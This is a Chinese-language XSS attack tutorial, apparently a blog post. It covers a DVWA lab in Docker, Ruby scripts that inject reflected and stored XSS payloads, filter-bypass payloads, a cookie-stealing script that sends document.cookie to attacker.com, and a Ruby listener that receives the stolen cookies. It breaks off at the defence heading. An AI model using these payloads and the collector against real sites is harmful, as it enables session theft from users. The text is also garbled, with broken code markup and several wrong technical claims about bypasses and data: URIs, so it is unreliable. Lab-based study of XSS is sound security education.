0x01 穿越同源限制：XSS的核心哲学

XSS（Cross-Site Scripting，跨站脚本攻击）是一种通过注入恶意脚本到目标网站的方式，来窃取用户数据、劫持会话、甚至直接控制目标浏览器的攻击技术。与SQL注入等攻击不同，XSS的核心在于突破浏览器的「同源策略」，让恶意代码在受害者浏览器中以可信源的身份执行。

XSS 的三种经典表现形式

反射型 XSS：恶意代码通过 URL 参数传递，立即在目标页面中执行。例如：

<pre><code class="language-html"> <script>alert('XSS!')</script> ` 这种攻击需要用户点击含有恶意 payload 的链接。

存储型 XSS：恶意脚本被永久存储在目标服务器上（如数据库），每次用户访问时都会被嵌入页面。例如在论坛留言板中的恶意评论：

`html <script>document.cookie='stolen='+document.cookie</script> `

DOM-Based XSS：攻击点在浏览器端的 JavaScript 逻辑中，恶意脚本通过修改页面 DOM 结构来执行。这种攻击不需要服务端参与，完全在客户端完成。

技术原理：为什么浏览器会中招？

XSS 攻击之所以有效，是因为浏览器会信任同源的内容，而不会对源代码中嵌入的脚本作进一步验证。攻击者利用这一点，将恶意代码注入到可信站点中，从而劫持用户的会话或窃取敏感信息。

在某些场景下，防御手段（如 CSP、安全的编码实践）不到位，XSS 攻击便成为了一个天然的切入点。

黑客示意图

---

0x02 打造你的实验室：从环境到工具

对于 XSS 的学习和研究，一个隔离的实验环境是必不可少的。以下是基于 Ruby 和 Shell 的简单搭建过程。

1. 环境准备

使用 Docker 构建一个简单的 Web 应用环境：</code></pre>shell

!/bin/bash

创建一个基础的XSS测试环境

docker run -d --name xss_lab -p 8080:80 vulnerable/web-dvwa echo "DVWA（Damn Vulnerable Web Application）已启动，访问 http://localhost:8080" <pre><code> DVWA 是专为渗透测试学习设计的一款漏洞靶场，内置多个经典漏洞（包括反射型和存储型 XSS）。

2. 初始化 DVWA

访问 http://localhost:8080。
默认用户名和密码是 admin 和 password。
点击 “DVWA Security” 将安全级别调整为低，便于测试。

3. 工具箱推荐

浏览器插件
Burp Suite 插件：调试和拦截流量。
HackBar：辅助构造 XSS Payload。
Ruby 脚本辅助

使用 Ruby 编写简易的 XSS 攻击代码，自动化测试 XSS 漏洞。

---

0x03 Payload 构造的艺术

有效的 Payload 是 XSS 攻击的核心。构造 Payload 的过程中，我们需要绕过过滤器、规避安全策略并触发恶意代码。

反射型 XSS 示例

以下是一个简单的反射型 XSS 演示。假设目标网站存在以下代码：</code></pre>html  <html> <body> <p>欢迎, <span id="user">%username%</span></p> </body> </html> <pre><code> 如果 %username% 是 URL 参数直接填充而未经过滤，我们可以注入恶意脚本：</code></pre>shell

构造攻击 URL

http://victim.com/?username=<script>alert('XSS')</script> <pre><code> 自动化测试脚本：</code></pre>ruby require 'net/http' require 'uri'

演示一个简单的反射型XSS攻击

def test_reflected_xss(target_url, payload) uri = URI.parse(target_url) uri.query = "username=#{payload}"

response = Net::HTTP.get_response(uri)

if response.body.include?(payload) puts "[+] XSS 成功！Payload 被执行: #{payload}" else puts "[-] XSS 测试失败。" end end

target = "http://localhost:8080/" xss_payload = "<script>alert('XSS')</script>" test_reflected_xss(target, xss_payload) <pre><code>

存储型 XSS 示例

假设目标网站有留言功能，但没有对用户输入进行过滤。攻击者可以插入以下 Payload：</code></pre>html <script>document.cookie='sid='+document.cookie</script> <pre><code> 黑客示意图

Ruby 自动化提交脚本：</code></pre>ruby require 'net/http' require 'uri'

自动将存储型XSS Payload插入目标

def exploit_stored_xss(target_url, comment_field, payload) uri = URI.parse(target_url) params = { comment_field => payload }

response = Net::HTTP.post_form(uri, params)

if response.body.include?(payload) puts "[+] 存储型 XSS 成功注入！Payload: #{payload}" else puts "[-] 存储型 XSS 注入失败。" end end

target = "http://localhost:8080/comment" xss_payload = "<script>alert('Stored XSS!')</script>" exploit_stored_xss(target, "user_comment", xss_payload) <pre><code> ---

0x04 绕过过滤器：实践中的对抗

现实环境中，安全开发人员通常会对输入内容进行过滤或转义。以下是几种常见的绕过方法：

绕过 HTML 实体转义

某些过滤器会将 < 和 > 转义为 &lt; 和 &gt;。此时可以利用十六进制编码：</code></pre>html <script>alert('XSS')</script> <pre><code>转换为：</code></pre>html <script\x3ealert('XSS')\x3c/script> <pre><code>

绕过标签限制

如果过滤器禁止 <script> 标签，但允许其他标签，可以使用事件属性：</code></pre>html <img src="x" onerror="alert('XSS')"> <pre><code>

绕过 CSP（内容安全策略）

当目标站点启用了 CSP，可以尝试以下方式绕过：

利用可信域的漏洞注入外部脚本。
使用 data: URI，例如：

`html <a href="javascript:alert('XSS')">点击这里</a> `

---

0x05 检测你的攻击：如何验证 XSS 是否成功

攻击的最终目的是执行恶意代码，获取有用信息。以下是几种验证方式：

1. 弹窗验证

最基础的测试方式，通过 alert() 验证 Payload 是否被执行。

2. 窃取 Cookie

攻击者可以通过注入以下代码窃取用户的会话 Cookie：</code></pre>html <script> fetch('http://attacker.com/steal?cookie=' + document.cookie); </script> <pre><code>

3. 自动化监听

使用简单的 Ruby 监听器捕获被窃取的数据：</code></pre>ruby require 'webrick'

server = WEBrick::HTTPServer.new(Port: 8081) server.mount_proc '/steal' do |req, res| puts "[+] 窃取到的Cookie: #{req.query['cookie']}" res.body = "数据已接收" end trap('INT') { server.shutdown } server.start `

---

0x06 路的尽头：防御与思考